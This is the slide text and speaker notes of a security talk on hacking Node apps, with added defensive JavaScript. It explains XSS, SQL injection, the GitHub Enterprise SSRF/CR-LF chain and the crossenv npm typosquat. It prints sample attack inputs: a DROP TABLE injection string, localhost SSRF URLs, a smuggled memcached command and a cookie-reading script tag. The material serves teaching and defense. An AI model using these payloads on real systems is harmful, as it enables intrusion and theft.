Asim Hussain
@jawache
codecraft.tv
microsoft.com
How to hack a node app? - LvivJS 2017
Photo by Kristina Flour on Unsplash
Photo by Veri Ivanova on Unsplash
Mr Robot
Photo by Nolan Issac on Unsplash
On Premise: Hardware / OS / App
IaaS: Hardware / OS / App
PaaS: Hardware / OS / App
It's Always Sunny In Philadelphia
'SELECT * from COMPANIES where name =' + name;
SELECT * from COMPANIES where name =; DROP TABLE "COMPANIES";-- LTD
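Added example, not from the talk: the string-concatenated query from the slide next to an escaped version. `escapeLiteral` is a local re-implementation of the backslash escaping the sqlstring package applies to MySQL string literals (so the example runs without npm); it is not the library itself, and `countStatements` is an assumed helper that only exists to show how many statements the database would see.

```javascript
// Constructed sample input: the registered company name shown on the slide.
const INJECTED_NAME = '; DROP TABLE "COMPANIES";-- LTD';

// The pattern from the slide: untrusted input glued straight into SQL.
function buildQueryUnsafe(name) {
  return 'SELECT * FROM COMPANIES WHERE name = ' + name + ';';
}

// Escape a value as a quoted MySQL string literal (the same characters sqlstring
// escapes: NUL, backspace, tab, newline, CR, Ctrl-Z, both quotes and backslash).
function escapeLiteral(value) {
  const map = {
    '\0': '\\0', '\b': '\\b', '\t': '\\t', '\n': '\\n', '\r': '\\r',
    '\x1a': '\\Z', '"': '\\"', "'": "\\'", '\\': '\\\\',
  };
  return "'" + String(value).replace(/[\0\b\t\n\r\x1a"'\\]/g, (c) => map[c]) + "'";
}

// Mimics sqlstring.format: each ? placeholder becomes one escaped literal.
function format(sql, values) {
  let i = 0;
  return sql.replace(/\?/g, () => escapeLiteral(values[i++]));
}

function buildQuerySafe(name) {
  return format('SELECT * FROM COMPANIES WHERE name = ?;', [name]);
}

// Count top-level statements, ignoring ';' inside quoted literals and anything
// after a '--' comment marker, to show how many statements the DB would run.
function countStatements(sql) {
  let count = 0, inQuote = null, inComment = false;
  for (let i = 0; i < sql.length; i++) {
    const c = sql[i];
    if (inComment) continue;
    if (inQuote) {
      if (c === '\\') i++;                 // skip the escaped character
      else if (c === inQuote) inQuote = null;
    } else if (c === "'" || c === '"') inQuote = c;
    else if (c === '-' && sql[i + 1] === '-') inComment = true;
    else if (c === ';') count++;
  }
  return count;
}
```

With the concatenated version the DROP TABLE ends up as a second statement; with the escaped version the whole name stays inside one string literal.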
Photo by Braydon Anderson on Unsplash
@orange_8361
git push
http://example.com
git push
http://localhost
git push
http://0
git push
http://0:9200/_shutdown
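Added example, not GitHub's code: why a string blacklist of "localhost" does not check a webhook URL, and what a range-based check looks like. It relies on the WHATWG URL parser (Node's global `URL`), which normalises hosts such as `0`, `0x7f000001` or `2130706433` into dotted IPv4 form before the octets are inspected; the function names are this example's own.

```javascript
// Parse a dotted IPv4 string into its four octets, or null if it is not one.
function ipv4Octets(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  return o.every((n) => n <= 255) ? o : null;
}

// True for addresses that must never be a webhook target: unspecified (0/8),
// loopback (127/8), link-local (169.254/16) and the RFC 1918 private ranges.
function isInternalIPv4(o) {
  return o[0] === 0 || o[0] === 127 || o[0] === 10 ||
    (o[0] === 169 && o[1] === 254) ||
    (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
    (o[0] === 192 && o[1] === 168);
}

// The naive check from the story: compare the raw string with a blacklist.
function blacklistAllows(url) {
  return !/localhost/i.test(url);
}

// The replacement: parse first, then classify the normalised host.
// NOTE: a hostname that is not an IP literal still has to be resolved and
// re-checked at connect time (DNS rebinding); that step is out of scope here.
function webhookAllows(url) {
  let u;
  try { u = new URL(url); } catch (e) { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  const host = u.hostname;
  if (host === 'localhost' || host.endsWith('.localhost')) return false;
  if (host === '[::1]' || host === '[::]') return false;
  const o = ipv4Octets(host);
  if (o) return !isInternalIPv4(o);
  return true;   // public hostname: allowed, subject to the resolve-time check
}
```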
# Graphite's send_email view (Python 2), as quoted in Orange Tsai's write-up:
# the attacker-supplied url is split and its path is handed to HTTPConnection
# unchanged, which is what makes the CR-LF injection below possible.
from urlparse import urlsplit
from httplib import HTTPConnection

def send_email(request):
    try:
        recipients = request.GET['to'].split(',')
        url = request.GET['url']
        proto, server, path, query, frag = urlsplit(url)
        if query: path += '?' + query
        conn = HTTPConnection(server)   # server is taken from the request
        conn.request('GET', path)       # path goes into the request line as-is
        resp = conn.getresponse()
        ...
http://0:8000/composer/send_email?
to=orange@nogg&
url=http://127.0.0.1:12345/foo
\r\n
%0D%0A
http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo:
GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1
Host: 127.0.0.1:12345
Accept-Encoding: identity
GET /
hello
Foo: HTTP/1.1
Host: 127.0.0.1:12345
Accept-Encoding: identity
...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A
GET /
set key 0 900 4 data
HTTP/1.1
Host: 127.0.0.1:11211
Accept-Encoding: identity
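Added example, not the talk's or Graphite's code: how a request line is built from a path, why a path that is percent-decoded before being written into it puts a second protocol's command (the memcached `set` from the slide) on its own line, and a guard that rejects such paths before any socket write. `buildRequest`, `requestLines` and `assertSafePath` are this example's own names.

```javascript
// Build the raw HTTP/1.1 request text the way a minimal client would.
function buildRequest(host, path) {
  return 'GET ' + path + ' HTTP/1.1\r\n' +
    'Host: ' + host + '\r\n' +
    'Accept-Encoding: identity\r\n\r\n';
}

// Split a raw request into its non-empty lines: what the peer will read.
function requestLines(raw) {
  return raw.split('\r\n').filter((l) => l.length > 0);
}

// Reject any path whose decoded form carries control characters. Returns the
// path unchanged when safe and throws otherwise. The path is percent-decoded
// first because that decoding step is exactly what let the CR-LF through in
// the story; a malformed percent sequence makes decodeURIComponent throw,
// which is also a rejection.
function assertSafePath(path) {
  const decoded = decodeURIComponent(path);
  if (/[\u0000-\u001f\u007f]/.test(decoded)) {
    throw new Error('control character in request path');
  }
  if (!path.startsWith('/')) throw new Error('path must be absolute');
  return path;
}

// Constructed sample: the path from the slide after the decoding that
// HTTPConnection performed, i.e. with real CR-LF bytes in it.
const SMUGGLED_PATH = decodeURIComponent('/%0D%0Aset%20key%200%20900%204%20data%0D%0A');
```

Feeding `SMUGGLED_PATH` to `buildRequest` reproduces the request on the slide, with `set key 0 900 4 data` as a line of its own; `assertSafePath` refuses it.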
DeprecatedInstanceVariableProxy
Photo by Kelly Sikkema on Unsplash
cross-env vs. crossenv
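Added example, not from the talk or from npm: two checks a team can run over a package.json before installing, taken from the crossenv story: a dependency name that is one edit (or just a dropped hyphen) away from a well-known package, and a manifest that declares install-time lifecycle scripts. `KNOWN_PACKAGES`, the version strings and the manifests are constructed sample data; a real allowlist would come from your own lockfile history.

```javascript
const KNOWN_PACKAGES = ['cross-env', 'express', 'lodash', 'mongoose', 'request'];

// Damerau-style edit distance: insert, delete, substitute, adjacent transpose.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0)));
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Return the known package a name looks like, or null when the name is an
// exact match or not close to anything. Hyphens, dots and underscores are
// stripped before comparing so "crossenv" vs "cross-env" is caught directly.
function lookalikeOf(name, known = KNOWN_PACKAGES) {
  if (known.includes(name)) return null;
  const norm = (s) => s.toLowerCase().replace(/[-._]/g, '');
  for (const k of known) {
    if (norm(name) === norm(k) || editDistance(name, k) <= 1) return k;
  }
  return null;
}

// Lifecycle scripts that npm runs when this package is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
function installHooks(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string');
}

// Audit a dependency map together with the manifests that would be installed.
function auditDependencies(deps, manifests) {
  const findings = [];
  for (const name of Object.keys(deps)) {
    const like = lookalikeOf(name);
    if (like) findings.push({ name, reason: 'lookalike of ' + like });
    const hooks = installHooks(manifests[name] || {});
    if (hooks.length) findings.push({ name, reason: 'install hook: ' + hooks.join(',') });
  }
  return findings;
}

// Constructed sample data modelled on the story: the typosquat ships a
// postinstall script pointing at a setup file named as in the talk.
const SAMPLE_DEPS = { crossenv: '^5.0.1', express: '^4.15.0' };
const SAMPLE_MANIFESTS = {
  crossenv: { scripts: { postinstall: 'node package-setup.js' } },
  express: { scripts: {} },
};
```

Run `auditDependencies(SAMPLE_DEPS, SAMPLE_MANIFESTS)` to see both findings raised for `crossenv` and none for `express`.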
Photo by Jairo Alzate on Unsplash
Stop pretending
Don't assume
Small vulnerability
Don't trust anyone
PaaS
Sanitise
Fix
https://www.pluralsight.com/courses/nodejs-security-express-angular-get-started/
Metasploit
https://www.metasploit.com/
DropTables Company
https://beta.companieshouse.gov.uk/company/10542519
SQLMap
http://sqlmap.org/
How I Chained 4 vulnerabilities on GitHub Enterprise - Orange Tsai
http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
Malicious packages in npm. Here's what to do - Ivan Akulov
https://iamakulov.com/notes/npm-malicious-packages/
Oscar Bolmsten on Twitter
https://twitter.com/o_cee/status/892306836199800836
npm module sqlstring
https://www.npmjs.com/package/sqlstring
Exploit DB
https://www.exploit-db.com/
Brian Clarke Security Course on Pluralsight
https://www.pluralsight.com/courses/nodejs-security-express-angular-get-started/
Editor's Notes

  • #2: Before I begin I'd like to ask a quick question... (pee question). Hopefully, by the end of the talk, that percentage will have increased, because today we are going to talk about security and hacking. [Introduce] To begin I'd like to tell you a story...
  • #3: Events site, side project. Working in investment banking, career going well, good money. Quit to work on this full time. Arrogant. Money started running out, had 3 months left. Found one investor still interested. Demo in 7 days. 48 hours. Linode. Investigate, confirmed, tmp folder. What was the source? Found PHP running, weird since I don't use PHP. Remembered. Resolution.
  • #4: I had read up on security. Followed all the instructions, locked down root access. Each process had a separate user account, firewalls, fail2ban. Done everything that I thought I needed to, but they still got in. I don't think I did anything really stupid, so if it can happen to me it can happen to anyone. So today I'm going to talk about hacking, but through 4 different hacking stories. Some specific to Node, some general. Each story has a moral at the end, a lesson to learn and some steps you can take to protect yourself. Let's start off with breaking down exactly how I think I was hacked at eventsushi.
  • #5: Let's first explain a few terms. A vulnerability is a hole in security, a weakness, e.g. not using a firewall is a vulnerability. An exploit is a tool, piece of code, or just a sequence of commands which takes advantage of a vulnerability to do bad things. Q) Who here has heard of the term 0 day exploit? A 0 day exploit is one that no one knows about, yet. It's a secret. Whitehat hackers and blackhat hackers. Blackhat: personal gain, considered the bad guys; find a zero day, might sell it to criminal organisations etc. Whitehat: good guys, security experts, employed by companies to find holes in security and plug them; find a zero day, they tell the company in private and let them fix it. Photo by Kristina Flour on Unsplash https://unsplash.com/search/photos/whisper?photo=BcjdbyKWquw
  • #6: As soon as a white hat hacker informs a company of the 0 day exploit it becomes known, becomes public. It's not called a 0 day exploit anymore. Then the clock starts ticking. How hard do you think it would be to get a hold of a 0 day exploit? How hard do you think it would be to get a hold of an exploit that's been in the public domain for 6 months? https://unsplash.com/photos/p3Pj7jOYvnM Photo by Veri Ivanova on Unsplash
  • #7: In fact it's very easy. There are lots of sites which contain lists of exploits, this one for instance: https://www.exploit-db.com/ [SHOW VIDEO]
  • #8: We think the hackers are like this... black hat... mysterious... computer geniuses. In fact, why would one of these people even bother? I'm a small startup who's losing money. They were not after money, or my data. They were just using me as a server from which to launch other attacks. I was just a "node" to them. They didn't care that Linode was gonna shut me down, that I was gonna lose everything. I don't believe the people that got onto my server were genius black hat hackers. They didn't use a 0 day exploit. I was running a really old version of PHP. My attacker GOOGLED how to hack me and followed instructions. Not hard!
  • #9: Or like this... ooooh mysterious....
  • #10: http://www.istockphoto.com/gb/photo/hard-at-work-gm518069822-89813857 But it probably looked like this... I was running an old version of PHP. My attacker GOOGLED how to hack me and followed instructions.
  • #11: In fact it's even easier than that... you don't even need to do this manually. Tools automate this whole process; Metasploit, from Rapid7, is one. It scans a site, identifies potential vulnerabilities, then lets you automate exploits from its database of plugins. So you just need to find an idiot like me on the internet, with an old version of PHP running, scan me with Metasploit and then try a few known exploits.
  • #12: So what can we do? We are still vulnerable to 0 day exploits. Can't defend from the unknown. Can defend from known exploits simply by keeping our software updated. That's easy, right, we just need to update... OS, Apache, Nginx, database software, underlying libraries, bulletins. Actually that sounds like a lot of hard work, and my job is to write apps, not maintain servers. So after this attack I started exclusively using PaaSs. Photo by Nolan Issac on Unsplash https://unsplash.com/photos/K5sjajgbTFw
  • #13: [Describe.] Patching. Companies. Leaving an OLD version of PHP running was a vulnerability. Don't think they came in through a 0 day. They came in using a known exploit, one that was probably already fixed in the latest version of PHP. So if I had at least updated PHP to the latest version I would be safe. But keeping everything updated is hard. So use a PaaS. On Premise: you look after hardware, OS and application code. IaaS: you look after OS and app code and they look after the hardware. PaaS: they look after hardware, OS (and software like web servers) and you just release app code. In the past I've used Heroku, Google App Engine; Amazon has something called Beanstalk but I've never used it, and Azure has something called App Service. Doesn't matter which one you use, to be honest; they all auto update the infrastructure versions on a pretty regular level, just make sure to use one.
  • #14: Azure Security Centre. Coolest thing about Azure; no one else has got this. Signals. Alerts create noise. So to solve this we trained an AI to detect hacking attempts from the signals. The AI can chain together signals and figure out if you are being attacked with a pretty high degree of certainty. It's not perfect, but I'm lazy and it doesn't require any effort to use, so I like to switch it on.
  • #15: Who watches this show? So my closing arguments. Thinking you can create a secure platform to host your app when you are not a security expert is like thinking you can represent yourself in court if you are not a lawyer. Next Steps: Use a PaaS. Did I manage to scare any of you? Probably not... maybe this next story will scare you more.
  • #16: http://www.istockphoto.com/gb/photo/little-boy-stealing-cookies-gm164114602-23379436 http://www.istockphoto.com/gb/photo/close-up-of-a-little-girl-taking-one-cookie-gm160146392-17820916 This story is about a company I used to work at. They were a financial startup. Brought in to help them move from an old Java framework to Angular. Framework decommissioned in 2003, first line of code was written in 2005. Can laugh, but it's financial services, so lots of regulation, including security. Hired a pen testing firm to try to hack us. It wasn't hard. This is the story of one of the vulnerabilities they found. It's called XSS or Cross-Site Scripting and it's a type of injection attack. They basically found a way to steal a user's cookies, then log in and make trades and financial transactions as that user.
  • #17: The way they did this was simple. The form that we used to submit a comment allowed some simple formatting, bold etc. It used HTML to define the text format.
  • #18: It then converted the HTML to Base64 and this was posted to the server and stored in the database. Later on, when it comes to displaying it, it converts from base64 on the server side and returns HTML from the server. NOTE: This is NOT an SPA, it's server-side rendered!
  • #19: So instead of the HTML you saw before, these hackers crafted their own HTML comment. This one had a script tag. Do you see what it's doing? It's sending your cookie to some other server, assuming you login with cookies this is giving someone else complete access to your account.
  • #20: Remember it gets converted to base64 first, and they just used Postman to post it to our APIs. Then when we rendered the page later on, we rendered it WITH their script tag!
  • #21: So just VIEWING a forum page with one of these special comments in it will send your cookie to someone else's server.
  • #22: http://www.istockphoto.com/gb/photo/deception-concept-disguise-between-shark-and-goldfish-gm534192884-94746997 http://www.istockphoto.com/gb/photo/in-the-wrong-place-gm92469124-700142 https://www.pexels.com/photo/close-up-of-human-hand-257279/ Moral of the story: Don't assume your inputs will arrive in the format you expect. What's the solution? Sanitise on the backend: on the server side you should strip tags it doesn't recognise: https://www.npmjs.com/package/xss [ADD] Sanitise on the frontend: frameworks like Angular by default assume that all content is untrusted and run it through a sanitiser, removing all script tags: https://angular.io/guide/security CSP script-src https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src [CSP]
  • #23: http://www.istockphoto.com/gb/photo/child-upset-before-getting-a-shot-at-the-doctor-gm97506563-12206370
  • #24: https://beta.companieshouse.gov.uk/company/10542519 Companies House. This is an actual limited company registered in the UK. It's an example of an attempt at an injection attack, a SQL injection attack. Run untrusted code in a trusted environment. The goal is to trick an application into running some raw SQL.
  • #25: So if someone wasn't careful and had a script that ran something like this 'select * from companies where name ='+ name;
  • #26: They would end up running something like this. But in other use cases name might be something a user entered into a form, or came from an API request. You are susceptible to this whenever you use "untrusted" input in a SQL statement. Backup database, so what? DROP TABLE isn't the only command. Don't even have to try all these commands manually.
  • #27: http://sqlmap.org/ It's such a common vulnerability that there are automated tools to help you attack, such as this one.
  • #28: Python script. Scans to begin with, finding out things like database software and version. Tries to guess the admin password from a database of passwords. Dump users table. Run shell commands. In about a minute, we can get access to the database, dump the users table and even run commands on the OS shell.
  • #29: Moral of the story: Don't assume your inputs will arrive in the format you expect. Photo by Braydon Anderson on Unsplash https://unsplash.com/collections/480109/animals-in-disguise?photo=wOHH-NUTvVc
  • #30: What's the solution? Sanitise: sqlstring. Strips out anything that looks unsafe from a SQL statement. Others: front end, XSS etc. Any time you have untrusted input from a user, sanitise.
  • #31: If you use something like Azure SQL Database it automatically ❤️ detects SQL injection attacks; doesn't stop them, but does send you an alert. How are you feeling now? I showed you an automated script which took over a database in under a minute. More scared?
  • #32: Who's heard of this company? So GitHub has a bug bounty. They pay you if you find a security hole in their software. This is a great write-up of an exploit found in GitHub Enterprise by someone called Orange Tsai; it gave a hacker the ability to run any command on the GitHub server as if they had a bash shell open on your server, chaining a number of smaller exploits together into one large exploit. Heist movie. I think it's a fascinating story which I've tried to break down for you and would love to tell. http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
  • #33: You know webhooks, right? You can set up a webhook so that when someone pushes to git it will POST to an HTTP endpoint.
  • #34: What if you set the webhook URL to localhost? Aha... then it will call a local process instead! But the GitHub people knew this. They USED a sanitiser that blacklisted localhost.
  • #35: But they didn't blacklist 0, which can resolve to localhost as well! The URL can contain a port number as well, so we can make a POST request to any port on the local machine.
  • #36: About the only thing he could do with that is shut down Elasticsearch.
  • #37: Graphite, charting, open source, so checked the source code and found this function.
  • #38: POST -> GET
  • #39: But that second GET request is using the HttpConnection lib, which is known to have a vulnerability called CR-LF injection.
  • #43: Lets us smuggle protocols
  • #44: This activity opens up the door to something called protocol smuggling. So if we send an HTTP request to the Redis instance on the box (6379) with the command SLAVEOF example.com 6379, then this Redis instance becomes a slave of our external Redis instance. So it opens the door to being attacked through protocols other than HTTP. What other things can we do?
  • #45: set key 0 900 4 data. Recognise that port number? memcached, key-value. Listing all the keys. Automatic serialisation of an object in memory, instance to memcached.
  • #46: Lets us smuggle protocols
  • #47: [CHANGE RUBY] So you take some code that exists in memory, convert it to a string or binary format, send that to memcached. Some time later, load the data again, convert it into a class and call a function.
  • #48: But now we have access to memcached. We can list keys, get data from memcached, but also set data: we can CHANGE what code is returned. So when you execute that code later on, you are running my code, not the code you stored.
  • #49: Serialised instances contain the name of the class. Found this one. Instance had a known vulnerability, so was deprecated. You can change a serialised instance of this class so that when it is called it executes a command in the shell instead. BUT they still used it, so it was easy to hack.
  • #52: Moral of the story: Big exploits are made from smaller exploits. Attacks don't come in through one big exploit. Multiple smaller exploits chained together. So if you found a vuln and are thinking of ignoring it, think again. How are you feeling now? Anyone need to go to the toilet? No? Maybe after the next story... Photo by Kelly Sikkema on Unsplash https://unsplash.com/search/photos/lego?photo=JRVxgAkzIsM
  • #53: What does the above code do? It gets all your environment variables and converts them to a base64 encoded string.
  • #54: What does the above code do? Take a look at the host name. It takes your environment variables and posts them to my server. How many of you keep secret keys, passwords etc. in environment variables? What if I told you I could make you run this code on your server?
  • #55: Does this make it any clearer, the file is called package-setup.js
  • #56: How about now? I can see the realisation coming to some of you. This is an npm module; when you install it you send me your environment variables. But you are probably thinking, why would you ever install an npm package you have never heard of?
  • #57: Take a look at this, posted a few weeks ago. cross-env is a very popular npm module created by Kent Dodds, over a million downloads every month.
  • #58: What they had done was release a module called crossenv, without the hyphen. That's it. It's called typosquatting. npm install from memory, tried with and without hyphens? When you run npm install you are basically giving other developers the right to run their code on your server, behind all your firewalls, as if you wrote the code.
  • #59: Moral of the story: We are too trusting! Maybe because open source: the developer is a good person, they have released code to the community for free, multiple eyes on it. The npm modules were up for 2 weeks before they were discovered. Not using the environment, key vault. But even that would not be safe: the code is running as if it was you who wrote it, so it will have access to even read from key vault. npm have taken down crossenv. Maybe already installed? Links at the end. Ecosystem is HUGE. Static analysis of npm packages. Double, triple sure you typed the module name correctly. https://unsplash.com/photos/sssxyuZape8 Photo by Jairo Alzate on Unsplash
  • #60: What's the takeaway? Stop pretending that because you've spent a few minutes thinking about security that you are safe. There are people who spend all day every day thinking of clever ways to get access to your site. Use a PaaS. Don't assume people will use your site as you expect them to use it; every input can be abused, be it an XSS on the client side or a SQL injection attack or something more complex. Every input the user provides can be abused, so sanitise, use CSP headers... whatever. No such thing as a small exploit; small ones can be chained together to create a big one. Fix your vulnerabilities no matter how small you think they are. Did the npm one scare you? It should... we are too trusting: we trust objects we store in a memcache are not going to be tampered with, we trust that everything we install from npm is trustworthy. Don't trust anyone!
  • #61: If you want a good follow-on course, my colleague Brian Clarke has one on Pluralsight; it's a good one for going a bit deeper into some of these issues.
  • #62: look like from behind
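Added example for the XSS story in notes #17 to #22, not the company's code: the base64 round trip the comment form used, with an escape-by-default sanitiser in the path the server takes before rendering. Only a small allowlist of bare formatting tags survives; everything else, including a script tag or any tag carrying attributes, is escaped so it renders as text. The allowlist and the sample comments are this example's own assumptions.

```javascript
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br']);

function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Walk the input: a bare allowlisted tag such as <b> or </em> is emitted as-is,
// every other character is escaped. Tags with attributes never match the
// pattern, so no onerror=, href= or src= can be carried through.
function sanitise(html) {
  const tag = /<\/?([a-zA-Z]+)\s*\/?>/y;   // sticky: match only at lastIndex
  let out = '', i = 0;
  while (i < html.length) {
    if (html[i] === '<') {
      tag.lastIndex = i;
      const m = tag.exec(html);
      if (m && ALLOWED_TAGS.has(m[1].toLowerCase())) {
        out += m[0].toLowerCase();
        i += m[0].length;
        continue;
      }
    }
    out += escapeHtml(html[i]);
    i += 1;
  }
  return out;
}

// What the client sends: formatted HTML, base64-encoded for transport.
function encodeComment(html) {
  return Buffer.from(html, 'utf8').toString('base64');
}

// What the server does before rendering: decode, then sanitise. Sanitising on
// the way out also covers comments that are already sitting in the database.
function renderComment(b64) {
  return sanitise(Buffer.from(b64, 'base64').toString('utf8'));
}

// Constructed samples: a benign comment and one carrying a script tag.
const BENIGN = 'Great <b>trade</b> idea!';
const HOSTILE = 'Nice <script>alert(document.cookie)</script>';
```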